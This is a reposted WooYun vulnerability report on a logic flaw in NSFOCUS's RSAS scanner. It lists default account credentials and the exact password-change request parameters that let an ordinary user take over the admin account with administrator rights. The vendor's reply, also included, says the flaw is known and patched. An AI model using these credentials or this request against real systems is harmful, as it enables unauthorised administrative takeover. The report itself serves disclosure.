漏洞概要
缺陷编号:
WooYun-2014-66244
漏洞标题: 绿盟远程安全评估系统逻辑漏洞直接进入管理通杀之一
相关厂商:
绿盟科技
漏洞作者:
路人甲
提交时间: 2014-06-26 08:24
公开时间: 2014-06-26 13:50
漏洞类型: 设计缺陷/逻辑错误
危害等级: 高
自评Rank: 20
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org
Tags标签:
逻辑错误
漏洞详情披露状态:
2014-06-26: 细节已通知厂商并且等待厂商处理中
2014-06-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
漏洞如下.
详细说明:
默认2个帐号:reporter,auditor密码是nsfocus。
用普通帐号登陆,修改密码处,
code 区域user%5Baccount%5D=admin&user%5Bname%5D=Admin&user%5Bpassword%5D=admin123&user%5Bpassword.confirm%5D=admin123&user%5Bmail%5D=admin%40example.com&user%5Broles%5D=ADMINISTRATORS&user%5BallowLoginIp%5D=*.*.*.*&user%5BallowScanIp%5D=*.*.*.*&user%5BmaxTask%5D=150
1 处修改ADMINISTRATORS
2 处修改 帐号 admin 就可以了。
最后即可admin登陆。
漏洞证明:
如上
修复方案:
程序开发人员修改下。加上码。
版权声明:转载请注明来源
路人甲@
乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-26 13:50
厂商回复:
谢谢告知。由于没有告知具体设备版本号,经过研发人员排查,此漏洞为已知漏洞,影响RSAS 5.0.8.13及以前版本,已在RSAS v 5.0.9.0版本中修复,2011-09-22升级包发布。
目前RSAS V5最新版本5.0.13以及RSAS V6均不受此漏洞影响。
如能告知发现此问题的设备的具体版本号,我们可做进一步的排查确认,非常感谢。
最新状态:
暂无
原文:http://www.wooyun.org/bugs/wooyun-2014-066244
[
本帖最后由 linda 于 2016-2-15 15:55 编辑 ]